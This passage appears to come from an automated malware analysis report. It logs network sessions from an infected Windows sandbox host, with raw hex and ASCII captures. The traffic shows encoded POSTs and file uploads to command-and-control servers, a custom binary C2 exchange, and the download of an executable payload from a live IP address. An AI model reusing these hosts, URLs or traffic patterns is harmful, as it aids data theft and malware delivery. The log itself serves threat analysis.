"-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49723	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:09.472172022 CEST	115	OUT	Data Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 88 5a 7d 2c 95 ca e1 e3 1b 3f df 1c ba f3 12 54 24 fb 38 b1 95 b0 ae af 77 b2 47 ed f2 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e Data Ascii: njfZ},?T$8wG5/3nerv.com.pe#
Sep 21, 2024 14:48:09.959917068 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:09 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49733	41.216.188.190	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:28.078635931 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 561 Host: 41.216.188.190
Sep 21, 2024 14:48:28.078635931 CEST	561	OUT	Data Raw: 64 61 74 61 3d 53 63 72 6d 41 52 41 6a 78 67 68 53 38 6c 37 43 45 77 4b 37 4a 71 77 51 6f 76 58 71 6f 77 78 5f 42 69 73 41 67 6d 51 6c 74 33 34 71 68 2d 32 4f 48 69 6a 75 72 62 37 6f 38 48 78 65 63 5f 4b 62 50 32 46 66 6b 4b 48 58 55 37 37 62 61 Data Ascii: data=ScrmARAjxghS8l7CEwK7JqwQovXqowx_BisAgmQlt34qh-2OHijurb7o8Hxec_KbP2FfkKHXU77ba2eIEUapJ3ZLhzvTAZar34hIXFeqftE-tRj1OWSzl9YFs9Tj2s96FE1Zz544WkekNa_1fbF941OSjI8hf8lIxYUzA2QDfqQdubbi7jWQ4ebbSXC-0Z_goyS-2pyfL1AjLS6d-i32yuWHcBb3JzGnsRPm07UKDtrN5c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49734	41.216.188.190	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:29.408023119 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 561 Host: 41.216.188.190
Sep 21, 2024 14:48:29.408051014 CEST	561	OUT	Data Raw: 64 61 74 61 3d 78 32 7a 37 41 53 53 58 47 59 34 50 43 66 44 48 49 44 49 57 6b 55 6b 53 52 59 41 4c 46 33 6b 44 4e 6f 62 68 78 45 57 69 53 53 65 46 73 33 35 55 51 6e 50 49 35 44 56 47 70 2d 53 31 75 51 59 44 65 65 56 70 42 55 38 45 42 68 6b 5f 30 Data Ascii: data=x2z7ASSXGY4PCfDHIDIWkUkSRYALF3kDNobhxEWiSSeFs35UQnPI5DVGp-S1uQYDeeVpBU8EBhk_0Aaijiv4T_iKZaapBJV8lxhwxGpjl_RRA0Kj8HJk-JBbdQjoDitq_MPmLAZWfIcYTjBinTWb6oMExDa6QsupoIpHezdkNz6N8HTislK-xg5hakycutQ9x2fmT_Ny20yp-n4QtgPRXobB4XRGsyCElVoAXjU9x01Kvs
Sep 21, 2024 14:48:31.543210983 CEST	363	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 49 6c 71 72 78 61 68 30 4d 46 50 62 67 58 56 6c 79 4d 35 61 46 35 6b 56 70 71 4f 4d 74 48 30 68 50 64 52 56 77 68 66 75 70 72 54 44 76 76 76 4c 58 7a 72 72 76 41 34 44 65 63 4a 37 6e 78 56 47 48 7a 62 44 67 49 2f 56 4e 38 4d 75 6c 67 71 53 55 64 2f 78 2b 4b 44 74 62 79 6a 4a 79 42 72 4a 58 67 6d 2b 50 6c 2b 69 42 46 45 3d Data Ascii: Ilqrxah0MFPbgXVlyM5aF5kVpqOMtH0hPdRVwhfuprTDvvvLXzrrvA4DecJ7nxVGHzbDgI/VN8MulgqSUd/x+KDtbyjJyBrJXgm+Pl+iBFE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49739	5.53.124.195	80	7932	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:41.153350115 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary30195191 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: tventyvf20pt.top
Sep 21, 2024 14:48:41.153390884 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 30 31 39 35 31 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 67 Data Ascii: ------Boundary30195191Content-Disposition: form-data; name="file"; filename="Vugepir.bin"Content-Type: application/octet-stream 5]_3H=WlPrTVaYYiG`,k+C@@i}\|'1S\"r6ZVF,0;.h\|Fh
Sep 21, 2024 14:48:41.407932043 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 21 Sep 2024 12:48:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49741	92.119.114.169	80	3124	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:42.567421913 CEST	36	IN	Data Raw: ad da ba ab 18 00 00 00 12 27 00 00 1c 3f 3c 3f 0c 3a 41 17 15 3f 15 1a 34 2b 13 4b 13 3c 21 35 32 55 4b 1b Data Ascii: '?<?:A?4+K<!52UK
Sep 21, 2024 14:48:42.929869890 CEST	36	IN	Data Raw: ad da ba ab 18 00 00 00 12 27 00 00 1c 3f 3c 3f 0c 3a 41 17 15 3f 15 1a 34 2b 13 4b 13 3c 21 35 32 55 4b 1b Data Ascii: '?<?:A?4+K<!52UK
Sep 21, 2024 14:48:45.696892023 CEST	12	OUT	Data Raw: ad da ba ab 00 00 00 00 10 27 00 00 Data Ascii: '
Sep 21, 2024 14:48:45.866461992 CEST	12	IN	Data Raw: ad da ba ab 00 00 00 00 11 27 00 00 Data Ascii: '
Sep 21, 2024 14:48:50.702366114 CEST	18	OUT	Data Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d Data Ascii: '
Sep 21, 2024 14:48:50.884762049 CEST	76	IN	Data Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18 Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
Sep 21, 2024 14:48:51.068799973 CEST	18	OUT	Data Raw: ad da ba ab 06 00 00 00 18 27 00 00 1a 15 10 1c 17 0d Data Ascii: '
Sep 21, 2024 14:48:51.316659927 CEST	14	IN	Data Raw: ad da ba ab 02 00 00 00 13 27 00 00 4f 49 Data Ascii: 'OI
Sep 21, 2024 14:48:51.351557016 CEST	1236	IN	Data Raw: ad da ba ab 54 36 0e 00 19 27 00 00 0a a3 95 84 0e 39 6a b2 8e 47 f7 b6 17 31 3b 96 2c d0 5b f1 f9 0d 69 2d ed d3 f9 4d 50 5b 73 33 f9 79 e8 6b 35 7b f3 27 6c 95 84 a3 6c 42 0f 95 c4 6e c9 8e a7 c8 d9 a1 6c 02 c2 af 96 e0 b0 fd ff d9 8e c7 07 96 Data Ascii: T6'9jG1;,[i-MP[s3yk5{'llBnlFU$([w;1\|;nr9m(k=+;A"[imm;0(C]_C&P+t<Q+<M8;hqJrLa4?1pFE=v{?Z2*N
Sep 21, 2024 14:48:51.351574898 CEST	224	IN	Data Raw: 7c 32 02 9b 21 30 33 2b eb f4 f6 86 27 33 bb 83 74 47 ba f8 ca 72 5d 34 1f 1f 30 58 60 9a b1 f4 42 df 51 70 6a 08 d3 a5 48 ba 28 15 99 41 cc 47 de da c9 4a 1b 30 4b e9 ec a8 95 b6 60 b4 31 b5 47 34 42 df c9 2c 5f 1a 32 65 dc 54 b7 0a d3 10 3f ff Data Ascii: \|2!03+'3tGr]40X`BQpjH(AGJ0K`1G4B,_2eT?0K?SKSBQoAB?0K#@Zm`d=:?RevMZ]!`h2Tm`d=:?be\iMZ]B `h2Tl`d*=:?"e\eMZ] `h2P3Xdz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49755	5.53.124.195	80	7932	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:55.401519060 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary80468628 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 87204 Host: tventyvf20pt.top
Sep 21, 2024 14:48:55.401624918 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 30 34 36 38 36 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 68 Data Ascii: ------Boundary80468628Content-Disposition: form-data; name="file"; filename="Zuhejace.bin"Content-Type: application/octet-streamf7p"bSp(whbo_o*KT9k\|C .zfnN);_c
Sep 21, 2024 14:48:55.406508923 CEST	1236	OUT	Data Raw: da 0e 12 f9 73 4b 4a 2b cc 63 12 12 11 5b e2 c9 8a de 02 80 3b 5c e2 2c 71 08 99 58 b5 f1 3d 68 f0 f0 4b 8c fb 0e 10 9c bc 45 66 1d ba 48 2b d3 be a1 79 48 34 3f 5a a8 c0 08 aa 56 dd ef ff 58 39 27 7c 55 5b 4f cd 58 61 22 60 9b 61 75 c4 ec 49 fc Data Ascii: sKJ+c[;\,qX=hKEfH+yH4?ZVX9'\|U[OXa"`auId[DX<QR-{-BW;;+,K@~r\XlzPm5M F1dgoFL29Ahn[)S)cMx
Sep 21, 2024 14:48:55.406585932 CEST	7416	OUT	Data Raw: df 4d bf 59 bb 35 08 f9 e1 cf be c6 bf 73 16 2e bb 25 b2 27 ff 55 f7 b8 c4 55 b3 e3 24 3a 9f 55 5e be 09 0b c4 16 9c de b2 fb 5d e8 2d 34 40 c7 16 12 6d 4d 23 26 53 7a 3d 0d db ae 5c f7 53 0c 1a 69 b7 08 4e e8 89 26 70 03 81 80 8b 23 e1 21 0b 01 Data Ascii: MY5s.%'UU$:U^]-4@mM#&Sz=\SiN&p#!D.49\|B2@{;w'&J;Tz8gQZ/l)l -:=(]T9}>H&`$W6B{aHl'SoG/UeO )Wr
Sep 21, 2024 14:48:55.406609058 CEST	2472	OUT	Data Raw: 94 1a 09 b1 06 b2 1f 91 9c 40 db 27 e9 6b 1f 9b 05 2d e4 34 62 ac 39 aa 4a 02 fa a9 fc 99 92 bf d6 cf 74 e7 13 ca 34 48 23 2f 9a d0 a4 52 8e 6e 29 bb 03 bd 2b f7 fd 9e cd 4d 76 88 ec 77 64 b5 35 86 1f 96 55 8c 2f 34 0b de 67 4b 25 0c d5 06 19 fa Data Ascii: @'k-4b9Jt4H#/Rn)+Mvwd5U/4gK%iDfFl){q]~Y82/^@{$SmRiE0^{(}=VWqSkW=u@ 7<JJ3Q]>"_Zo@(
Sep 21, 2024 14:48:55.406660080 CEST	2472	OUT	Data Raw: d1 e9 82 6c f0 7a 0f 97 27 a7 c7 59 53 0d bd 83 e2 9b ef 61 85 f7 d8 ae 41 ce 7d 42 f5 ec 59 74 99 81 db 8c 45 a8 f8 f8 74 24 41 cb 91 7e 48 0e 11 39 8e 55 3d 8e ee b9 1c 4e 86 61 b4 0a 34 a9 59 3d b8 17 ee 4e 9f a1 a7 9d d8 98 a1 d8 f9 f7 00 a6 Data Ascii: lz'YSaA}BYtEt$A~H9U=Na4Y=NY0N;&"O+:h!<`QG\]'iprfv,:Bb4}cIr*egVLyl)aY#n&f6H>#P/V(SDDP8->qB^SO
Sep 21, 2024 14:48:55.406706095 CEST	4944	OUT	Data Raw: 30 ba a6 dd 34 07 ec 30 d8 35 9e 62 43 21 df 07 11 18 8c 72 34 00 d7 1d 62 f1 fc f9 b0 59 f2 ee 40 4b ca b6 bd 95 b2 62 f1 ec 02 d9 a6 4d f4 a0 4d 52 57 8b 7a 02 62 cc 58 4a 10 4c 0d 5c 58 e3 35 47 ce 65 9d d7 5d 67 0a 4c a0 3b 44 0e d5 4d f2 81 Data Ascii: 0405bC!r4bY@KbMMRWzbXJL\X5Ge]gL;DMZ5fr$+vQz0kh=DA>{,;*6wYG.`q4x]u\|ChW0x\|,N\|^B9}gVsLS)x_a0@NC:iH.{Y
Sep 21, 2024 14:48:55.406729937 CEST	2472	OUT	Data Raw: 37 b5 5f 77 e3 4a d3 ff f7 e8 46 ca 20 18 30 41 f9 e2 0e bd 87 78 af 62 8c 8b f0 c8 76 d6 fc 59 9e 82 92 c5 be 13 c7 e8 aa 3b 26 b2 d0 7f 58 ef 24 3e fc 4f 77 04 5f e8 12 9e 5d 9f 35 f4 13 7e 64 b5 13 19 b6 74 f8 99 e2 be c2 44 90 e1 fe 3d 15 dd Data Ascii: 7_wJF 0AxbvY;&X$>Ow_]5~dtD=m"E:vP.n}c^PCAH2xrwxIddf5KSFK"Wk[[yAd#l~gt]FgGqd\\^Z?bA4_y-`Rgop n0vB7ZBW?-
Sep 21, 2024 14:48:55.411055088 CEST	2472	OUT	Data Raw: 3e 67 52 6c cd 35 fd bb a6 19 d0 da 1c c3 12 c4 36 d3 79 f1 44 a9 ea 66 3d ac 32 0f 76 72 b7 e2 dd 7d 98 87 42 d9 45 7f 4f eb 89 ae 94 37 73 c9 42 2b d3 20 93 8a 05 fc c4 92 76 b2 7b 9f ae 70 4a be f5 7c ac ed ab 6e a6 f1 cb 1b a0 2f 2e 45 56 c1 Data Ascii: >gRl56yDf=2vr}BEO7sB+ v{pJ\|n/.EV$Fb*CxsVm1@Mu#?[ShIrR)WxZ,cbp5\]$~rTUcmw<wPTAVkUw=1=oDShVyfW0g
Sep 21, 2024 14:48:55.411319017 CEST	2472	OUT	Data Raw: d8 43 8a 17 28 d7 29 50 e4 97 bf 65 76 4d b4 0d 67 cd 7a 2f cd cf d5 e2 27 02 f6 8e 2c 72 8c b6 db 1b cb b5 a7 19 b1 2b 32 f3 c9 93 40 a8 5a b2 d1 27 72 f0 c8 ed 89 cd b6 d0 23 ef 97 a8 ac 8c 57 fc 1e cc 90 0a ac 34 4f cd fb 8f 60 ff 9a 34 b4 d0 Data Ascii: C()PevMgz/',r+2@Z'r#W4O`4[b;tfo5E~,o y<DL;W:^J0lXF=Oh:\;]CAKz(/85(+#\|GmLM'KQQk):bn,B
Sep 21, 2024 14:48:55.411437988 CEST	2472	OUT	Data Raw: 84 d5 62 1a 21 52 5f d8 47 50 fa 83 d4 5e 9f 01 a8 08 9b 42 66 9b 34 6d 2a 96 fe 1c 3b a9 95 1c a7 3c d9 32 ed a3 8e 11 91 27 c9 f5 9f 1e ab 22 71 ba 08 ca 52 e6 39 ac d7 bb 08 72 5e 37 47 77 25 79 0e 1d 1d 5f d2 68 62 c0 eb 69 9e 3d bc 22 ab 13 Data Ascii: b!R_GP^Bf4m;<2'"qR9r^7Gw%y_hbi="\|9nFTUpVSh;krQYD"S6L4g,c!E`.we+%>E[- l$L2}nsr=;hdS"_$T?FC^~IHE(
Sep 21, 2024 14:48:56.341326952 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 21 Sep 2024 12:48:56 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49764	5.53.124.195	80	7932	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:06.469652891 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41747459 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 32239 Host: tventyvf20pt.top
Sep 21, 2024 14:49:06.469712019 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 37 34 37 34 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 61 72 Data Ascii: ------Boundary41747459Content-Disposition: form-data; name="file"; filename="Qareliw.bin"Content-Type: application/octet-stream2 w~ U /imHh\|`sI,ZP@<>i9"Q mB\y<vQy&tHM(~V
Sep 21, 2024 14:49:06.474510908 CEST	1236	OUT	Data Raw: 46 c6 2d 9e 49 88 05 28 a2 76 9f e1 23 b2 19 1e 80 0a 4e 21 91 b7 4b 71 a7 43 e1 25 a1 48 7a 49 06 b8 7d 31 e1 8e 46 16 65 f2 55 fe d2 d8 07 2d 65 4f 86 f7 40 fd 3d ac 36 bb 4e b3 e1 6f a7 28 d3 29 a9 ef 26 9b b6 39 e4 6a dc 73 cd de 04 98 fd c7 Data Ascii: F-I(v#N!KqC%HzI}1FeU-eO@=6No()&9jsQk$j+V[.BzZ2Th\|?+,l!(t%>Hdz/oVf+n}g~N^$1)8RUBsE~vn-<s8 ]
Sep 21, 2024 14:49:06.474628925 CEST	2472	OUT	Data Raw: 1d e2 0b 2f c7 a6 d5 be 55 b8 d1 23 76 e3 20 92 88 dd bc c9 d6 08 a0 cf 28 35 7c 39 c1 17 c1 8f eb 3d a5 43 49 2c 76 ce f0 5e 5b df f5 78 10 0b 98 ac 31 e1 2b e7 89 6c 7a cf 7f 3c f9 cb de 74 d6 f7 91 8a ee e4 1f 98 da dc 63 57 69 ac fa 73 7f a2 Data Ascii: /U#v (5\|9=CI,v^[x1+lz<tcWis_=0V.8Sm86H]D/v3M,VMQ7\CvN<3Wh}"^o,mVvvo}b4kdnu_]fFZLicTN
Sep 21, 2024 14:49:06.474684954 CEST	4944	OUT	Data Raw: af d4 7c 7e e6 2c 44 65 41 aa 22 be 5d 18 71 7b 77 5e 6d 84 f7 48 c5 00 4f 81 b2 c7 a8 42 54 bd 73 e9 d2 3b 9e 79 0f 5f 3a 44 fd 36 c0 76 ae 14 2f 34 f4 79 b2 61 10 89 a2 87 91 12 ce d3 1f fc 91 9f 73 d6 be b1 41 20 d5 62 52 ed 85 73 b9 3d e7 e2 Data Ascii: \|~,DeA"]q{w^mHOBTs;y_:D6v/4yasA bRs=3KJ:Qpf<BPod ^)'KmR>C8O'1tAly{zio'{KkAB0MT=,"[c1/Je)N"_I/ErmeNU(pzWvz
Sep 21, 2024 14:49:06.474798918 CEST	2472	OUT	Data Raw: 05 b5 93 47 bc 24 d0 f7 68 cb 68 cf 93 47 39 a7 df 23 a7 2d 53 c6 46 29 2d 6b c6 6d f3 70 bd ed 1d 65 e2 55 ea be ca 11 c8 a8 b2 fb cd 19 c2 ce 5b 43 66 ab 2e 48 83 56 8d 5a c5 f3 ca cb 25 80 65 87 60 00 40 24 14 3e e3 2d 9d 47 84 68 77 10 77 a9 Data Ascii: G$hhG9#-SF)-kmpeU[Cf.HVZ%e`@$>-Ghww9{Y5II[(g'K;.\s$_)h}KJ[/!h^4G-!p1"$#Lr\@C(gx,d(zQqfHLAN%ZCP
Sep 21, 2024 14:49:06.474813938 CEST	4944	OUT	Data Raw: 9b 03 21 9d 8b 92 29 b2 cb 79 0a 75 54 a5 09 8d 71 f6 77 3e 83 34 8b eb ec 74 3d e2 0c 3d 67 be ce 32 7d ac 0e 95 84 dd 71 cd ca 92 65 e1 8b 20 f6 a2 8a 0a fd 1a 94 85 6b 9e 78 ad 4c e8 26 7c a3 4e 45 6f bd 1b 26 2e ce 09 d3 56 39 7d 63 ec 3b 2c Data Ascii: !)yuTqw>4t==g2}qe kxL&\|NEo&.V9}c;,7M #Y/W3Y!]o1GQI$RG;_4{Wi\>u^>u2w@OIt>bYQ<miRc \g2dHI,f-&[=
Sep 21, 2024 14:49:06.477449894 CEST	5047	OUT	Data Raw: 13 c7 10 5a 56 8a af f8 58 93 b8 cf 7f 59 dc 8b 37 c0 2a 33 98 01 42 99 e9 b7 0d 7d 3b e8 e8 98 80 ae 63 4e 14 61 ee d1 35 a0 f6 77 71 25 21 0c d5 b6 c6 e3 e3 b2 1f 19 19 65 0b 36 bf 2f 43 c8 f8 af d7 eb 7d 2a a7 6b b9 ad 0e 22 06 c9 1d 85 3f 82 Data Ascii: ZVXY73B};cNa5wq%!e6/C}k"?g`uj`hkE>L<uM`><S{yf/gL2Gjp15*3-JIxHYe>:$G,kKf?p(M4Jf0n4}>NnugT
Sep 21, 2024 14:49:07.617567062 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 21 Sep 2024 12:49:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK
Sep 21, 2024 14:49:07.617718935 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 21 Sep 2024 12:49:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49776	147.45.44.104	80	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:49:30.053076982 CEST	194	OUT	GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 14:49:30.781898975 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:30 GMT Content-Type: application/octet-stream Content-Length: 363424 Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ecb454-58ba0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf2~Q `@ `,QO`xe(&O H.text1 2 `.rsrc`4@@.reloc:@B`QHAVeOz?Z#btHxK+,57>1G2%ju-EmRU-6W4bW5>B] sf'(o}kPq>j][T.sp}HT-o8.^pK7?ntEK>^8p+bW{:SjZzd2i65u\|vUy1#6P}$K\X$ZDXqK^I>Ljv-H-KEG)r
Sep 21, 2024 14:49:30.781938076 CEST	1236	IN	Data Raw: b2 43 8e 2c 79 2d 5e 36 8d b2 90 cf f2 d9 15 8d 12 89 0b 18 7e 4d 4a 29 8b 27 c0 ea d3 0f 4b a4 cb 09 9b 22 70 d5 35 b8 f3 cb 39 f6 9a de 41 af 93 30 89 d5 97 73 43 55 c3 db 3d a6 ec 1f e1 03 ef 9c f7 46 59 79 b1 b1 19 42 0c b5 77 eb d9 c9 7e b0 Data Ascii: C,y-^6~MJ)'K"p59A0sCU=FYyBw~JqF:Yt;<b2D/.r}q~PcS)4&/cWHJ\q%QEdIjh^qYaadn/ny)w,HDQ<(Z}hkUkr.4"lB@
